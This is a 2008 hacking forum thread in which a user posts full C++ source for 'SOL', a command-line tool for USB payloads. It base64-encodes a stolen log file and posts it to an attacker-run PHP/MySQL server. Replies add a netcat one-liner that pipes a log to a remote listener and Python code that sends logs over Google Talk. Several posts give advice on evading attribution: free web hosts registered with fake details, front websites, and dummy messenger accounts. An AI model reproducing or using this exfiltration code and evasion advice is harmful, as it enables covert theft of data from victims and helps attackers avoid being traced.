Steve8x Posted October 31, 2008 Share Posted October 31, 2008 Recently people have generated interest in my idea of posting log files to a server sided php script for storage in a MySQL database! So I have come up with a command line utilty, that can be used with switchblades/hacksaws in batch scripting... its simple to use, here's the syntax: sol [-p port] [-h host] [-s script] [-f file] ex. sol -p 8080 -h myaccount.myhost.com -s /path/to/script.php -f file.txt sol -h popeax.com -s /test/index.php -f test.txt the port parameter is optional but the other three are required... port 80 is assumed if the port is not specified... the parameters can be specified in any order actually, but I thought this order makes the most sense... Here's how it works. It first reads entire file into memory(note: this is meant for sending like text files/log files, not really binary files although it would work) Once the file is in memory it encodes it with base64 (other encoding can be used but I like this one, even though it makes the file slightly larger) then it sets up the HTTP header to post to the page, as if it were a firefox 3.0.1 web browser. it posts two variables to the php script on the server, t and f. t stands for title, it is just the file name of the file being posted. f stands for file, it is all the data contained in the file encoded with base64. So your php script recieving the data has to correspond. I am providing the php files so don't worry... On the php side, the server sided script will receive the posted data, it will be as if you took the contents of the file and posted them to a form on your web site ;) The data is then inserted into the database still in its encoded form. When you want to view the logs you visit your script and login with a username and password that you specify in the php file, its important that you change it from the default of user "root" password "root". then you can see info about the logs posted, and click a link to view the contents of each file. When you view a log, the page prints the encoded log into a textarea box, and some javascript code decodes it and displays the decoded contents in the same box... I found php's base64_decode() function would screw up and return an empty string if the decoded content contained any special characters.(maybe I was just something wrong?) well with the javascript I've gotten it to work nicely! I've successfully posted a log over 100KB in size(larger than logs usually are so this should work great!) and also successfully posted a log with special characters! You can login and view my test page here: popeax.com/test/index.php username: root && password: root All that is required is a free web host that offers php + mysql (at least 1 database) If you need help finding one here's a great link that has many: http://www.free-webhosts.com/free-mysql-database.php here you can download the php files: http://popeax.com/test/recv.zip for the php files you'll have to modify config.php so that the database info matches your mysql database, and also change the default username and password to actually login to view the logs! coded in MSVC++ 2008 here's the source + binary to SOL (look in release folder for binary) http://popeax.com/test/sol.zip It should work on any windows machine! with no dependencies (winsock doesn't count as a dependency since everyone has it) Here's an image I took when I uploaded a test file: Oh and I left out the encryption part for now because I couldn't get it to work right! So well have to do without it for now until we get that to work right! Happy Hakoween :) [sol.cpp] //Send Outgoing Logfile(SOL) //A command line app which sends a logfile //to a server sided php script for processing //Written By Steve8x #include "sol.h" char* host = new char[260]; char* path = new char[260]; char* file = new char[260]; char* pword = new char[260]; int port = 80; //default port int main(int NumParams, char* Cmd[]) { system("color 0A"); memset(host, 0, 260); memset(path, 0, 260); memset(file, 0, 260); //strcpy(pword, "hak5"); if(Cmd[1] == 0) { printf("\nUsage: sol [-p port] [-h host] [-s script] [-f file] \n"); printf("Examples:\n"); printf("sol -p 8080 -h myhost.com -s /path/to/script.php -f file.txt\n"); printf("sol -h host1337.com -s /usr/bin/script.php -f file.txt\n"); return 0; } //Get Parameters! for(int i = 1; i < NumParams; i++) { if(strcmp(Cmd[i], "-p") == 0) { port = atoi(Cmd[i+1]); } if(strcmp(Cmd[i], "-h") == 0) { strcpy(host, Cmd[i+1]); } if(strcmp(Cmd[i], "-s") == 0) { strcpy(path, Cmd[i+1]); } if(strcmp(Cmd[i], "-f") == 0) { strcpy(file, Cmd[i+1]); } } if(host[0] == 0 || path[0] == 0 || file[0] == 0) { printf("\nhost, script, file parameters are required\n"); return 0; } //Init winsock 2.2 WSADATA wsaData = {0}; WSAStartup(MAKEWORD(2, 2), &wsaData); printf("\n\nConnecting to-> %s:%i", host, port); printf("\nPosting to script-> %s", path); printf("\nFile being sent-> %s\n\n", file); if(LoadFileIntoMemory() == 0) { printf("Could Not Open \"%s\"", file); return 0; } //lets leave the encryption out for now until we can get it to work right! //encrypt the file in memory //XORbuffer(fbuff, fsize, pword); //encode with base64 for transfer sendme = base64_encode((const unsigned char*)fbuff, fsize); printf("Original File Size: %u bytes\nAfter Encoding: %u bytes\n", fsize, sendme.size()); SendFile(); delete[] host; delete[] path; delete[] file; delete[] pword; delete[] fbuff; return 1; } bool SendFile() { //Create A Client Object! This Will Act As A Firefox Web Browser //Max value for mediumblob is 16383 KB //But we wont ever send a log file that big //So lets make max 1024KB (1MB) even though you wont even send that much xClient* cli = new xClient; char* postdata = new char[1048576]; unsigned long datalength = 0; ZeroMemory(postdata, 1048576); datalength = (strlen(file) + sendme.size() + 5); //(+5 because "t=&f=" count as content) sprintf(postdata, "POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nAccept: %s\r\nKeep-Alive: 300\r\nconnection: keep-alive\r\nReferer: http://localhost/pwned.php\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %i\r\n\r\nt=%s&f=", path, host, UserAgent.c_str(), Accept.c_str(), datalength, file); sendme.insert(0, postdata); if(cli->ConnectToServer(host, port) == 0) { printf("\nFailed to connect to server!\n"); ExitProcess(0); } //Post logfile to database :) sendx(cli->serversock, (char*)sendme.c_str(), sendme.size()); cli->Close(); printf("\n\nFile Sent Successfully!\n\n"); //just so you get an idea of what was sent to the webserver //keep this commented out //f = fopen("SentData.txt", "wb"); //fwrite(sendme.c_str(), sendme.size(), 1, f); //fclose(f); //Clean up delete cli; delete[] postdata; return TRUE; } long getfilesize(FILE* f) { long temp; fseek(f, 0, SEEK_END); temp = ftell(f); rewind(f); return temp; } bool LoadFileIntoMemory() { f = fopen(file, "rb"); if(!f) return FALSE; fsize = getfilesize(f); fbuff = new char[fsize]; fread(fbuff, fsize, 1, f); fclose(f); return TRUE; } void XORbuffer(char* buff, DWORD buffsize, char* pass) // Simple Encryption -- currently not used... { int x = 0; int passlength = strlen(pass); for(DWORD i = 0; i < buffsize; i++) { if(x == passlength) { x = 0; } buff[i] ^= pass[x]; // ^ means XOR in c++;) x++; } } Quote Link to comment Share on other sites More sharing options...
Kei Posted November 2, 2008 Share Posted November 2, 2008 I think this is a good idea and great example how to use it for such noob as I am Thanks Steve! Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 4, 2008 Share Posted November 4, 2008 Great work! I will update my own payload by now... And... Will you add this stuff to the wiki? Quote Link to comment Share on other sites More sharing options...
X3N Posted November 4, 2008 Share Posted November 4, 2008 assuming you have control of a webserver you might as well use netcat or any decent scripting language has the capability of opening tcp sockets and then you can just write the data to a log file. Not even needing to log in to anything. And while your at it just use socat which will do an encryption of the tunnel. server machine- setup a listening netcat server nc-v -l -p 1337 target machine cat log.log | nc serveraddy 1337 another method is assuming you have control of a web server is shoot the data at it and then read the log to retrieve the information. This method i haven't tested yet but theoretically its possible. The only point of these other methods is to hide it via obscurity and not having to send any passwords or leave any incriminating evidence behind. However if anyone is running a packet sniffer they would see whats going on. Or if you were running socat at the very least they would see the origin and the destination which could get you in trouble. I still think the best case scenario is setup a dummy gmail account and then send all your data to that. Then there's no trace back unless Google got involved with an investigation. Quote Link to comment Share on other sites More sharing options...
kz26 Posted November 5, 2008 Share Posted November 5, 2008 Big kudos to Steve8x for posting great material that's not just n00b talk. This is a very elegant method, but I see one potential flaw. Anyone running a sniffer over the net or who could look at the program parameters could see where the log is being posted to. Since a webserver's owner can be traced in most cases, this might have potentially catastrophic consequences for the hacker were he/she to be found out... Quote Link to comment Share on other sites More sharing options...
Steve8x Posted November 5, 2008 Author Share Posted November 5, 2008 Yes you can see where the log is being posted to, but you can't see the password to the mysql database ;) If your sending the logs to your own computer your own ip, then you have a problem... So thats why you create a free web hosting account with one of the many free web hosts (with fake info of course) You don't use a paid for host!!! Also you should create a website as a front! so the free web host wont shut your site down for not having any actual content. Because they do check them once in a while to make sure your complying with their TOS. X3N, yes you can virtually do anything with the PHP code once you have received the data on it, I just demonstrated using mysql databases, because thats something that lots of hosts offer plus its fairly easy to insert data into! Sometimes on free hosts certain things are limited. But mysql databases are plentiful ;) Quote Link to comment Share on other sites More sharing options...
X3N Posted November 5, 2008 Share Posted November 5, 2008 Yes you can see where the log is being posted to, but you can't see the password to the mysql database ;) If your sending the logs to your own computer your own ip, then you have a problem... So thats why you create a free web hosting account with one of the many free web hosts (with fake info of course) You don't use a paid for host!!! Also you should create a website as a front! so the free web host wont shut your site down for not having any actual content. Because they do check them once in a while to make sure your complying with their TOS. X3N, yes you can virtually do anything with the PHP code once you have received the data on it, I just demonstrated using mysql databases, because thats something that lots of hosts offer plus its fairly easy to insert data into! Sometimes on free hosts certain things are limited. But mysql databases are plentiful ;) Yeah im not knocking your method its way more elegant than mine but it seemed just as efficient as using email... I had come up with a different great idea though. Create a dummy IM account through AIM or MSN and then send the data via that to yourself or another dummy account. That would be neat. And if your login info was compromised then it wouldnt lead back to you at all... and it would be IP and URL independent. Quote Link to comment Share on other sites More sharing options...
Steve8x Posted November 6, 2008 Author Share Posted November 6, 2008 Yeah im not knocking your method its way more elegant than mine but it seemed just as efficient as using email... I had come up with a different great idea though. Create a dummy IM account through AIM or MSN and then send the data via that to yourself or another dummy account. That would be neat. And if your login info was compromised then it wouldnt lead back to you at all... and it would be IP and URL independent. X3n I never thought of that! But its a good GREAT idea actually! Only issue is it would be a little awkward receiving your log files in an instant messenger! lol... Although for services like MSN, you don't have to be signed online to get your logs, once you sign on you'll get all your messages, I think its called offline messaging... You'd have to decide whether you'd want to send them in plaintext(to save time so when you look at it in your instant messenger you can just read the log and copy and paste it into a file to save it. Or you could send it encoded/encrypted, and have to do an extra step decoding/decrypting the copy and pasted data from the IM window... You could possibly even use the IM apps own save log file option, and have a custom app read through it and decode/decrypt the content, it would have to know how to read the file saved from that particular IM so it would be able to get the content only and not the: message from user: info saved with the file... Doing it wouldn't be to hard I don't think, You'll just have to do some packet sniffing with your IM of choice and figure out how it communicates with the server to login and send some instant messages! ;) Then code a client app which does only the basics, sign in, send IM! And as you said IM accounts are a dime a dozen you can easily make one just for this purpose and you really don't care if the user+password is discovered since it isnt for anything important... I'll look into it see if I can figure it out! I think I'll go with MSN/Windows Live Messenger Quote Link to comment Share on other sites More sharing options...
X3N Posted November 6, 2008 Share Posted November 6, 2008 X3n I never thought of that! But its a good GREAT idea actually! Only issue is it would be a little awkward receiving your log files in an instant messenger! lol... Although for services like MSN, you don't have to be signed online to get your logs, once you sign on you'll get all your messages, I think its called offline messaging... You'd have to decide whether you'd want to send them in plaintext(to save time so when you look at it in your instant messenger you can just read the log and copy and paste it into a file to save it. Or you could send it encoded/encrypted, and have to do an extra step decoding/decrypting the copy and pasted data from the IM window... You could possibly even use the IM apps own save log file option, and have a custom app read through it and decode/decrypt the content, it would have to know how to read the file saved from that particular IM so it would be able to get the content only and not the: message from user: info saved with the file... Doing it wouldn't be to hard I don't think, You'll just have to do some packet sniffing with your IM of choice and figure out how it communicates with the server to login and send some instant messages! ;) Then code a client app which does only the basics, sign in, send IM! And as you said IM accounts are a dime a dozen you can easily make one just for this purpose and you really don't care if the user+password is discovered since it isnt for anything important... I'll look into it see if I can figure it out! I think I'll go with MSN/Windows Live Messenger yeah i had the same idea... i was thinking of some console based Linux messenger program... there's also the possibility of using jabber or the xmpp standard... which is the same one as gtalk uses. http://www.gnu.org/software/freetalk/ Freetalk looks promising if there is a win32 version And there's decoder programs similar to the plug in for Firefox that does gpg on your emails http://getfiregpg.org/ Quote Link to comment Share on other sites More sharing options...
X3N Posted November 6, 2008 Share Posted November 6, 2008 i found some cool python code to send messages via xmppd seems to work decently... the only thing im not sure of is weather its using any encytion by default or if its plaintext... i got it to work even though im kinda new to python... heres the code... first you have to install the python modules xmppy and dnspython # Google Talk constants FROM_GMAIL_ID = "username@gmail.com" GMAIL_PASS = "yourpassword" GTALK_SERVER = "talk.google.com" TO_GMAIL_ID = "user@gmail.com" jid=xmpp.protocol.JID(FROM_GMAIL_ID) cl=xmpp.Client(jid.getDomain(),debug=[]) log=open('log.log', 'r') if not cl.connect((GTALK_SERVER,5222)): raise IOError('Can not connect to server.') if not cl.auth(jid.getNode(),GMAIL_PASS): raise IOError('Can not auth with server.') cl.send( xmpp.Message( "recipient@gmail.com" ,log.read() ) ) cl.disconnect() log.log being the name of the log file you are wanting to send. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.